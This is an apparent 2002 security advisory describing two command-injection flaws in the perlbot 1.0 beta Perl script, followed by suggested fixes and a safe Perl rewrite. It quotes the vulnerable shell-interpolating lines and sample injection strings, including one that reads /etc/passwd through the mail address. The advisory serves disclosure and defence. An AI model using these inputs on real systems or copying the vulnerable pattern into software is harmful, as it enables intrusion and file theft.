[VulnWatch] SCAN Associates Advisory: madhater perlbot 1.0 beta - Remote Command Execution

From: guejez (guejez@scan-associates.net)
Date: 10/18/02


From: "guejez" <guejez@scan-associates.net>
To: <vulnwatch@vulnwatch.org>
Date: Fri, 18 Oct 2002 19:42:17 +0800

perlbot 1.0 beta - Remote Command Execution
Discovered By guejez of scan-associates.net

 About perlbot:
 ------------------
 [quote from perlbot website]

 ""

 [/quote from perlbot website]

 perlbot is available at http://stigmata.gothcafe.com/~madhater

 Vulnerable (tested) Versions:
 --------------------
 Perlbot version 1.0 beta on SuSE 7.3

 Vendor Contact:
 ----------------
 07-22-02 - Emailed myneid ^^at^^ gothcafe.com; alerted him of this
            vulnerability.
 07-22-02 - Received email confirming the vulnerabilities and stating fixes
            could be in a new version.

 Vulnerabilities:
 ----------------
 -- Command Execution

 1. Due to no input filtering and a call to the shell, the script could be
    used to execute any command it has permission to run.

    A more detailed explanation:

 The script does not restrict the characters that user input can send to the
 shell. The problem is in this line:

 foreach(`/bin/echo "$word" | /usr/local/bin/ispell -a`)

 Because $word is interpolated into the backtick command, the shell interprets
 its contents, which allows an attacker to "break out" of the quotes and issue
 any command they wish with something like anything";cmd. Other abuses include
 issuing commands with `cmd` or $(cmd), or \xxx where xxx is the octal value of
 any character. Some form of user input filtering must be used.

 2. Due to no input filtering and an unsafe open() call when the script
    attempts to send email, it is possible to execute commands.

    A more detailed explanation:

 The script attempts to send an email to the user. It takes the user's email
 address and passes it to the shell as an argument to the mail program:

 open (MAIL,"| $sendmail $recipient") || die $!;

 This means an "address" such as hacker@scan-associates.net < /etc/passwd could
 be used to retrieve any file from the system that the script has permission
 to read, and command execution is possible with hacker@scan-associates.net ;
 cmd. To prevent this, simply take the $recipient value out of the shell call.

 Proof Of Concept:
 -----------------
 No proof of concept will be given for these issues.

 Fix:
 ----
 According to the author, a fix could be in a new version of the script. The
 script's homepage was down at the time of this advisory, so here is the
 suggested fix. Replace the following line:

 my $word=$';

 With:

 my $word=$';
 $word =~ s/[^\w]//g;

 And replace the following line:

 open (MAIL,"| $sendmail $recipient") || die $!;

 With:

 open (MAIL,"| $sendmail -t") || die $!;

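 As an added example (not perlbot's code, nor the author's fix above), the
 two shell calls from this advisory rewritten so that user input is never
 handed to /bin/sh: anchored allow-list checks that reject bad input rather
 than stripping it, and list-form open()/open2(), which exec the program
 directly. The ispell and sendmail paths are assumptions, and /bin/cat stands
 in for ispell in the demo so it runs without a spell checker installed.

```perl
# Added example, not perlbot's code: the advisory's two shell calls without a
# shell. Paths to ispell/sendmail are assumptions; /bin/cat stands in for ispell.
use strict;
use warnings;
use IPC::Open2;

# Allow-list check for the word: letters only, anchored at both ends, so
# quotes, ';', backticks, '$(' and '\ooo' are rejected instead of stripped.
sub checked_word {
    my ($word) = @_;
    return ($word =~ /\A([A-Za-z]{1,64})\z/) ? $1 : undef;
}

# Allow-list check for the recipient. With 'sendmail -t' the address lands in
# the To: header the script writes, so CR/LF (header injection) is rejected too.
sub checked_address {
    my ($addr) = @_;
    return ($addr =~ /\A([\w.+-]+\@[\w-]+(?:\.[\w-]+)+)\z/) ? $1 : undef;
}

# Run the checker with list-form open2 (e.g. '/usr/local/bin/ispell', '-a'):
# arguments go straight to exec, and the word travels over stdin as data.
sub spell_lines {
    my ($word, @cmd) = @_;
    my $pid = open2(my $out, my $in, @cmd);
    print {$in} "$word\n";
    close $in;
    my @lines = <$out>;
    close $out;
    waitpid $pid, 0;
    return @lines;
}

# Send mail through a list-form pipe open (no shell) with a checked To: header.
sub send_mail {
    my ($sendmail, $to, $body) = @_;
    open(my $mail, '|-', $sendmail, '-t') or die "cannot run $sendmail: $!";
    print {$mail} "To: $to\nSubject: spell check result\n\n$body";
    close $mail or die "sendmail failed: $!";
}

# Demo on constructed inputs shaped like the advisory's attack strings.
for my $input ('hello', 'anything";id', 'x`id`') {
    my $w = checked_word($input);
    print defined $w ? "accepted: $w\n" : "rejected: $input\n";
}
# 'cat -' echoes stdin, so the metacharacters come back verbatim as data.
print 'cat saw: ', spell_lines('anything";id', '/bin/cat', '-');
print defined checked_address("a\@example.com\nBcc: x") ? "bad\n" : "CRLF address rejected\n";
```

 send_mail() is defined but not called in the demo, since it would hand a
 message to the local sendmail.
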
 Thanks:
 -------
 irc.efnet.org #vuln - various people helping with perl security issues.
 pokleyzz, sk, and all of scan-associates.net

--------------------------------------------------------------------------
http://www.scan-associates.net/
